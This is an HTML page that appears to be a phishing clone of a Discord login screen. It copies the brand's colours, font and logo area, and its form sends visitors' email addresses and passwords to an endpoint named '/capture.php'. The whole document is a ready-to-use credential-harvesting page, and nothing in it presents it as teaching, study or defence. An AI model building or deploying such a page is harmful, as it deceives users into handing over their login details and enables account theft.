<!DOCTYPE html>
<html>
<head>
    <style>
        body { background: #36393f; color: #dcddde; font-family: 'Whitney', sans-serif; }
        .container { width: 480px; background: #2f3136; border-radius: 8px; padding: 32px; }
        .logo { text-align: center; margin-bottom: 20px; }
        .input { background: #202225; border: none; color: white; padding: 10px; border-radius: 3px; }
        .button { background: #5865f2; color: white; border: none; padding: 10px; border-radius: 3px; }
    </style>
</head>
<body>
    <div class="container">
        <div class="logo">
            <svg width="124" height="34" viewBox="0 0 124 34" fill="#5865F2">...</svg>
        </div>
        <form action="/capture.php" method="POST">
            <input class="input" type="email" name="email" placeholder="Email" required><br>
            <input class="input" type="password" name="password" placeholder="Password" required><br>
            <button class="button" type="submit">Login</button>
        </form>
    </div>
</body>
</html>